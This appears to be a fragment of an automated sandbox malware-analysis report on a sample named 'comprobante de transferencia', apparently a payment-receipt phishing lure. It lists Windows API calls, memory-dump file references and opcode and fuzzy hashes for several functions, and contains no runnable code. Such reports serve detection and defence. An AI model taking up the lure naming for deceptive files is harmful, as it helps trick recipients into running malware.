                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                            • CloseHandle.KERNEL32(?), ref: 00405730
                                            Strings
                                            • Error launching installer, xrefs: 0040570D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                            • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                            • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                            • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                            • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                            • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                            • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                            • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                            • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                            • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                            • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                            • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                            • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                            • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                            • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                            • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                            • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                            • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                            • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                            • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                            • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                            • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                            • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                            • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                            • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                            • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                            • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                            • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                            • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%